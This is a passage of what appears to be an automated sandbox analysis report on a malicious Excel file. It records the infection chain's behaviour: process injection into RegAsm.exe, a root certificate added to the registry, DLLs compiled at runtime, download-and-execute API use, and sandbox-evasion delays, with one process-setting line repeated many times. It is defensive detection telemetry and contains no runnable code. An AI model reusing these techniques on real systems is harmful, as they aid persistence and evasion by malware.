                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899B79D7 push ebx; retf 14_2_000007FE899B79DA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899B022D push eax; iretd 14_2_000007FE899B0241
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899B00BD pushad ; iretd 14_2_000007FE899B00C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_10002806 push ecx; ret 20_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044693D push ecx; ret 24_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044DB70 push eax; ret 24_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044DB70 push eax; ret 24_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00451D54 push eax; ret 24_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0044B090 push eax; ret 25_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0044B090 push eax; ret 25_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00451D34 push eax; ret 25_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00444E71 push ecx; ret 25_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00414060 push eax; ret 26_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00414060 push eax; ret 26_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00414039 push ecx; ret 26_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004164EB push 0000006Ah; retf 26_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00416553 push 0000006Ah; retf 26_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00416555 push 0000006Ah; retf 26_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004470B7 push eax; retf 0046h 31_2_004470B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00457186 push ecx; ret 31_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0045E55D push esi; ret 31_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00457AA8 push eax; ret 31_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00434EB6 push ecx; ret 31_2_00434EC9

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00406EEB ShellExecuteW,URLDownloadToFileW,31_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,31_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,31_2_0041CBE1
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                  Source: 037002451082_10142024.xls Stream path 'Workbook' entropy: 7.99773217234 (max. 8.0)
                  Source: 7D330000.0.dr Stream path 'Workbook' entropy: 7.99771293724 (max. 8.0)

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0040F7E2 Sleep,ExitProcess,31_2_0040F7E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,24_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,31_2_0041A7D9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4827
